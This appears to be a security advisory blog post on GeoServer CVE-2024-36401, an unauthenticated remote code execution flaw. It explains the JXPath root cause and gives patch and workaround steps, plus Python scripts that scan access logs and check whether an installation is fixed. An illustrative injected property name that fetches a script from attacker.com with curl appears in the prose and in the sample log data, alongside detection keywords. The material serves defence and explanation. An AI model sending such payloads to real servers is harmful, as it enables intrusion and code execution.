GeoServer is a popular open-source server for sharing and editing geospatial data. Many organizations rely on it to serve maps and spatial data to the web, to apps, and to internal systems. A critical vulnerability, CVE-2024-36401, puts every unpatched GeoServer instance at risk of Remote Code Execution (RCE), and the attacker needs no credentials.
In this post we break down what the vulnerability is, how it works, what an attacker gains from it, how you can protect yourself, and why you must patch your GeoServer now.
What Is CVE-2024-36401?
CVE-2024-36401 affects GeoServer releases before 2.23.6, 2.24.4 and 2.25.2. GeoServer evaluates property names taken from OGC request parameters (for example the propertyName of a WFS GetFeature request, and the equivalent parameters of WMS and WPS requests) as XPath expressions, so a specially crafted property name results in arbitrary code execution on the server.
The root cause lies in how GeoServer, through the GeoTools library, evaluates property names:
- GeoServer passes attribute/property names to the commons-jxpath library, even for simple feature types. JXPath expressions can invoke Java methods, so an attacker can inject XPath whose evaluation reaches code execution.
- The JXPath evaluator is only meant to support complex feature types, but it is mistakenly applied to all request processing, so every request path that accepts a property name is exposed.
How It Works
The problem appears in code similar to the following (simplified for explanation; this is an illustration, not GeoServer's actual source):
// Vulnerable pseudocode - simplified for illustration
import org.apache.commons.jxpath.JXPathContext;

// The property name comes straight from the OGC request (e.g. the WFS propertyName parameter)
String propertyName = request.getParameter("propertyName");
// JXPath treats the untrusted string as a full XPath expression, which may call Java methods
Object value = JXPathContext.newContext(feature).getValue(propertyName);
An attacker can supply a propertyName that JXPath evaluates as an expression rather than looking up as an attribute, and such an expression can invoke Java methods.
For example (an illustration of the idea, not a working payload):
propertyName=java.lang.Runtime.getRuntime().exec('curl attacker.com/shell.sh')
If an expression like this were evaluated, the server would fetch and run a script of the attacker's choosing.
Exploitation path:
1. Locate a reachable GeoServer OGC endpoint. No credentials are needed; the endpoints are normally open to anonymous users.
2. Craft a malicious OGC request, for example a WFS GetFeature request such as
GET /geoserver/ows?service=WFS&version=1.1.0&request=GetFeature&typeName=topp:states&propertyName=[malicious-xpath-here] HTTP/1.1
Host: target-geoserver.com
3. Send it to the server: GeoServer evaluates the property name with JXPath, and the injected expression runs with the privileges of the GeoServer process.
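As an added example (not part of the original post, and not GeoServer's own tooling), here is a Python check that runs over web-server access-log lines and flags OGC requests whose property-name parameter does not look like an attribute name. The log lines are constructed for this example. The watched parameters include valueReference, the WFS 2.0 GetPropertyValue parameter, on my own reading of that interface; that addition, and the indicator substrings, are assumptions of this example rather than statements from the post.

```python
import re
from urllib.parse import parse_qsl, urlsplit

# Constructed sample access-log lines (Apache/Tomcat "combined" format); not real traffic.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jul/2024:12:00:01 +0000] "GET /geoserver/ows?service=WFS&version=1.1.0&request=GetFeature&typeName=topp:states&propertyName=STATE_NAME,PERSONS HTTP/1.1" 200 5120 "-" "QGIS/3.34"
10.0.0.5 - - [01/Jul/2024:12:00:03 +0000] "GET /geoserver/wms?service=WMS&version=1.1.1&request=GetMap&layers=topp:states&bbox=-125,24,-66,50&width=768&height=330&srs=EPSG:4326&format=image/png HTTP/1.1" 200 40211 "-" "QGIS/3.34"
198.51.100.7 - - [01/Jul/2024:12:00:09 +0000] "GET /geoserver/ows?service=WFS&version=1.1.0&request=GetFeature&typeName=topp:states&propertyName=java.lang.Runtime.getRuntime().exec('curl%20attacker.com/shell.sh') HTTP/1.1" 200 312 "-" "python-requests/2.31"
198.51.100.7 - - [01/Jul/2024:12:00:11 +0000] "GET /geoserver/ows?service=WFS&version=1.1.0&request=GetFeature&typeName=topp:states&propertyName=gml:name/text()%20%7C%20foo HTTP/1.1" 400 0 "-" "python-requests/2.31"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3})'
)

# Parameters whose value GeoServer treats as a property name. propertyName is the one named in
# the post; valueReference (WFS 2.0 GetPropertyValue) is an assumption of this example.
WATCHED_PARAMS = {"propertyname", "valuereference"}

# A legitimate property name is an attribute name, optionally namespace-prefixed ("topp:STATE_NAME"),
# optionally "@"-prefixed for XML attributes, and possibly a "/"-separated path for nested attributes.
SAFE_SEGMENT = re.compile(r"^@?[A-Za-z_][\w.\-]*(?::[A-Za-z_][\w.\-]*)?$")

# Substrings with no business in an attribute name (assumed indicators, chosen for this example).
KEYWORDS = ("java.", "exec(", "runtime", "processbuilder", "scriptengine")


def suspicious_property_value(value: str) -> list[str]:
    """Return the reasons a property-name value looks like injected XPath ([] if it looks clean)."""
    reasons = []
    for name in value.split(","):  # propertyName may carry a comma-separated list of names
        name = name.strip()
        if name and not all(SAFE_SEGMENT.match(seg) for seg in name.split("/")):
            reasons.append(f"non-attribute syntax: {name!r}")
    lowered = value.lower()
    reasons.extend(f"keyword {kw!r}" for kw in KEYWORDS if kw in lowered)
    return reasons


def scan_log(text: str) -> list[dict]:
    """Parse combined-format log lines and flag GET requests with suspicious property-name params."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # not a request line this parser understands; skip it
        query = urlsplit(m["target"]).query
        for key, raw in parse_qsl(query, keep_blank_values=True):  # parse_qsl percent-decodes
            if key.lower() not in WATCHED_PARAMS:  # OGC parameter names are case-insensitive
                continue
            reasons = suspicious_property_value(raw)
            if reasons:
                findings.append({"ip": m["ip"], "time": m["ts"], "status": m["status"],
                                 "param": key, "value": raw, "reasons": reasons})
    return findings


if __name__ == "__main__":
    import sys
    # Reads a log from stdin when one is piped in, otherwise scans the constructed sample.
    text = SAMPLE_LOG if sys.stdin.isatty() else sys.stdin.read()
    for f in scan_log(text):
        print(f"{f['time']} {f['ip']} HTTP {f['status']} {f['param']}={f['value']!r}")
        for r in f["reasons"]:
            print("   -", r)
```

Run it as `python3 scan.py < access.log`. Two caveats: a hit is a reason to investigate the source address, not proof of compromise, and a clean scan proves little on its own, because POST requests carry the property name in an XML body that a standard access log does not record; for those you need request-body logging at a reverse proxy or WAF.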
No Public PoC (Yet)
At the time of writing, no working public exploit code had been released (the disclosure was coordinated and the issue is critical), but the researchers who reported the bug confirmed that it is practical and exploitable through the request paths listed above. Do not treat the absence of a public PoC as protection: the vulnerable code path is reachable by any anonymous OGC request, and the fix itself shows where to look.
Fixes and Workarounds
PATCH NOW
Upgrade to the fixed release for your branch: 2.23.6, 2.24.4 or 2.25.2 (or any later release).
Patch download and release notes:
- GeoServer Download
- GeoServer Security Announcement (original reference)
- CVE Record
Workaround:
If you can't patch right away, remove the vulnerable GeoTools module from your installation:
- Find the file WEB-INF/lib/gt-complex-x.y.jar, where x.y is the GeoTools version bundled with your GeoServer release.
- Delete it, or move it out of WEB-INF/lib, and restart GeoServer.
- Caveat: the module provides complex-feature support, so removing it can break functionality or stop GeoServer from deploying if an extension you use depends on it. Test the change on a non-production instance first, and treat the workaround as temporary until you upgrade.
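As an added example (not part of the post or of the GeoServer project), here is a small Python script that turns the version and workaround guidance above into a check: it decides whether a GeoServer version string is at or past the fixed release for its branch, looks for the gt-complex jar among the files in WEB-INF/lib, and returns a verdict. It assumes the standard WAR layout in which GeoServer's own modules are named gs-<module>-<version>.jar (so the installed version can be read from the gs-main jar), and it treats branches newer than 2.25 as fixed and branches older than 2.23 as unmaintained and unfixed; both are my assumptions, not statements from the advisory.

```python
import re
from pathlib import Path
from typing import Iterable, Optional

# Fixed releases named in the advisory, keyed by branch (major, minor).
FIXED = {(2, 23): (2, 23, 6), (2, 24): (2, 24, 4), (2, 25): (2, 25, 2)}

# Assumed jar naming: GeoServer modules are gs-<module>-<version>.jar; the GeoTools module the
# workaround removes is gt-complex-<geotools version>.jar (the "x.y" of the advisory).
GS_MAIN_RE = re.compile(r"^gs-main-(\d+\.\d+(?:\.\d+)?(?:-\w+)?)\.jar$")
GT_COMPLEX_RE = re.compile(r"^gt-complex-\d+\.\d+(?:\.\d+)?(?:-\w+)?\.jar$")


def parse_version(s: str) -> tuple:
    """'2.25.1' -> (2, 25, 1). A missing patch number (e.g. '2.25-SNAPSHOT') counts as 0, i.e. unfixed."""
    m = re.match(r"^\s*(\d+)\.(\d+)(?:\.(\d+))?", s)
    if not m:
        raise ValueError(f"not a GeoServer version string: {s!r}")
    return int(m.group(1)), int(m.group(2)), int(m.group(3) or 0)


def is_fixed(version: str) -> bool:
    """True if this version carries the CVE-2024-36401 fix for its branch."""
    v = parse_version(version)
    branch = v[:2]
    if branch in FIXED:
        return v >= FIXED[branch]
    # Assumption: branches cut after 2.25 carry the fix; branches older than 2.23 are out of
    # maintenance and never received one.
    return branch > max(FIXED)


def recommended_release(version: str) -> str:
    """Fixed release to move to: same branch if it has one, otherwise the newest fixed branch."""
    branch = parse_version(version)[:2]
    target = FIXED.get(branch, FIXED[max(FIXED)])
    return ".".join(map(str, target))


def find_complex_jars(jar_names: Iterable[str]) -> list:
    return sorted(n for n in jar_names if GT_COMPLEX_RE.match(n))


def version_from_jars(jar_names: Iterable[str]) -> Optional[str]:
    for n in jar_names:
        m = GS_MAIN_RE.match(n)
        if m:
            return m.group(1)
    return None


def assess(version: str, jar_names: Iterable[str]) -> str:
    """Verdict for one installation: patched, mitigated by the workaround, or vulnerable."""
    jars = find_complex_jars(jar_names)
    if is_fixed(version):
        return "patched"
    if not jars:
        return ("mitigated: gt-complex jar absent (workaround applied); still upgrade to "
                + recommended_release(version))
    return ("vulnerable: upgrade to " + recommended_release(version)
            + " or remove " + ", ".join(jars) + " until you can")


def assess_install(lib_dir: str) -> str:
    """Run the check against a real WEB-INF/lib directory."""
    names = [p.name for p in Path(lib_dir).iterdir()]
    version = version_from_jars(names)
    if version is None:
        raise RuntimeError("gs-main-*.jar not found; is this GeoServer's WEB-INF/lib?")
    return f"GeoServer {version}: {assess(version, names)}"


if __name__ == "__main__":
    import sys
    print(assess_install(sys.argv[1] if len(sys.argv) > 1 else "WEB-INF/lib"))
```

Point it at the exploded WAR (`python3 check.py /opt/tomcat/webapps/geoserver/WEB-INF/lib`). A "mitigated" verdict only means the jar is gone from disk; confirm the instance was restarted afterwards, since a running JVM keeps using classes it has already loaded.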
Should You Worry? (Yes)
All GeoServer installations, including default, out-of-the-box setups, are vulnerable, and attackers need no authentication. Successful exploitation gives the attacker code execution with the privileges of the GeoServer process.
Quick check:
- [ ] Is your GeoServer internet-accessible, or accessible to untrusted users?
- [ ] Do you process WFS/WMS/WPS requests?
If you answered yes to either, patch immediately or apply the workaround.
Like to Dig Deeper?
- GeoServer GitHub Advisory
- National Vulnerability Database Entry
- GeoServer Official Announcement
Final Thoughts
Don't wait to apply this patch. If you run GeoServer in production, in testing, or even as a demo, update or mitigate immediately. The threat is real, and exploitation is trivial once a working payload is known. Firewall rules and WAF signatures can at best filter payloads that are already known; only upgrading (or removing the gt-complex module until you can) closes the hole.
Stay safe, and patch your GeoServer!
If you have any questions or need help upgrading, the GeoServer User List and Community are great resources.
Timeline
Published on: 07/01/2024 16:15:04 UTC
Last modified on: 07/18/2024 21:28:49 UTC